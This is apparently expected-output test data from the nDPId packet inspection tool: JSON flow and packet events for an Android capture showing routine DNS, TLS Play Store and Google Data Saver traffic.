00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"}
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="}
00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="}
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
